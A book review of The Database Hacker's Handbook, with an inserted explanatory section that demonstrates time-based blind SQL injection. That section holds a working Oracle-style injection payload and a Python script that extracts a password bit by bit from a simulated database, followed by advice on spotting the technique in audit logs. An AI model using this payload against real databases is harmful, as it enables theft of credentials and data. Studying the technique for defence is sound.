The Database Hacker's Handbook (TDHH) is unique for two reasons. First, it is written by experts who spend their lives breaking database systems. Their depth of knowledge is unparalleled. Second, TDHH addresses security for Oracle, IBM DB2, IBM Informix, Sybase ASE, MySQL, Microsoft SQL Server, and PostgreSQL. No other database security book discusses as many products. For this reason, TDHH merits four stars. If a second edition of the book addresses some of my later suggestions, five stars should be easy to achieve.
The first issue I would like to see addressed in a second edition of TDHH is the removal of the 60 pages of C code scattered throughout the book. The code is already provided on the publisher's Web site, and its appearance in a 500-page book adds little. The three pages of characters (that's the best way to describe it) on pages 313-315 in Ch 19 are really beyond what any person should be expected to type.
The second issue involves general presentation. Many chapters end abruptly with no conclusion or summary. Several times I thought "Is that it?" Chapters 2, 5, 7, 10, 13, 15, 18, 21 and 22 all end suddenly. The editor should have told the authors to end those chapters with summaries, as appear in other chapters. On a related note, some of the "chapters" are exceptionally short; Ch 9 and 12 are each 3 pages, for example. Chapters that short are an indication the book is not organized well.
The final issue involves discussion of various databases. I preferred the "Hacking Exposed" style of the 2003 book SQL Server Security, which included Dave Litchfield and Bill Grindlay as co-authors. That book spent more time introducing the fundamentals of database functions before explaining how to break them. For example, more background on PL/SQL would be helpful. With 60 pages of code removed, that leaves plenty of room for such discussion in the second edition.
On the positive side, I thought TDHH started strong with Ch 1. The Oracle security advice was very strong. I thought the time delay tactic for extracting bit-by-bit information from the database was also exceptionally clever.
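The time-delay tactic mentioned above is what is now usually called time-based blind SQL injection: the attacker injects a condition that makes the database sleep when one bit of a secret value is set, times the response, and reassembles the value bit by bit. The following Python script is an added illustration, not code from the book or from the reviewer, and it talks to a simulated database rather than a real one. The Oracle-style payload (SUBSTR, ASCII, BITAND, DBMS_LOCK.SLEEP are real Oracle functions), the users/password table and column, the 'admin' row and the secret value are all assumptions made for the demo.

```python
import re
import time

# Constructed stand-in for a value the attacker cannot read directly (e.g. a password hash).
SECRET = "Tiger1"
# Delay the injected payload asks the server to sleep for; kept short so the demo runs quickly.
# Against a real target you would use several seconds to stand out from network jitter.
DELAY = 0.05

# Oracle-style injected condition. Table, column and row name are hypothetical.
# The attacker never sees the query result, only how long the request takes.
PAYLOAD = (
    "' AND CASE WHEN BITAND(ASCII(SUBSTR((SELECT password FROM users "
    "WHERE name='admin'),{pos},1)),{mask})>0 "
    "THEN DBMS_LOCK.SLEEP({delay}) ELSE 0 END = 0 --"
)

# The simulated server only needs the two numbers the attacker varies: position and bit mask.
_PARSE = re.compile(
    r"SUBSTR\(\(SELECT password FROM users WHERE name='admin'\),(\d+),1\)\),(\d+)\)>0"
)


def simulated_database(sql: str) -> None:
    """Stand-in for the vulnerable application. It evaluates the injected condition
    against SECRET and sleeps when it is true, exactly what the payload asks a real
    Oracle server to do; nothing is returned to the caller."""
    m = _PARSE.search(sql)
    if not m:
        return
    pos, mask = int(m.group(1)), int(m.group(2))
    if pos > len(SECRET):
        # SUBSTR past the end yields NULL, ASCII(NULL) is NULL, so the condition is false.
        return
    if ord(SECRET[pos - 1]) & mask:
        time.sleep(DELAY)


def bit_is_set(pos: int, mask: int) -> bool:
    """One request per bit: send the payload and decide from the elapsed time."""
    start = time.perf_counter()
    simulated_database(PAYLOAD.format(pos=pos, mask=mask, delay=DELAY))
    return time.perf_counter() - start >= DELAY / 2


def extract_char(pos: int) -> str:
    """Recover one character of the secret, eight timed requests, one per bit."""
    value = 0
    for bit in range(8):
        if bit_is_set(pos, 1 << bit):
            value |= 1 << bit
    return chr(value)


def extract_secret(max_len: int = 32) -> str:
    """Walk the string position by position until a character with no bits set,
    which is what the NULL past the end of the string looks like to the attacker."""
    out = []
    for pos in range(1, max_len + 1):
        c = extract_char(pos)
        if c == "\0":
            break
        out.append(c)
    return "".join(out)


if __name__ == "__main__":
    print(extract_secret())
```

The cost of the technique is visible in the loop structure: eight requests per character, each one either returning immediately or after the chosen delay, so a long value takes minutes and leaves a very regular pattern of slow queries in the database's audit trail. That regularity, and calls to sleep functions appearing in application queries at all, are the things to look for on the defensive side.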
Although I have not read it, I believe Implementing Database Security and Auditing by Ron Ben Natan might be a good complement to TDHH. Natan's book appears to take a functional approach, whereas TDHH takes a product-specific approach. The drawback of the product-centric approach is repetition of general security advice, such as enabling encryption, disabling default accounts, etc.
At the end of the day TDHH is still a revealing and powerful book. Anyone responsible for database security should refer to the sections of the book covering their database. I also recommend keeping an eye on the Next Generation Security Software Web site for the latest on database security issues. You should also see the authors speak at security conferences whenever possible.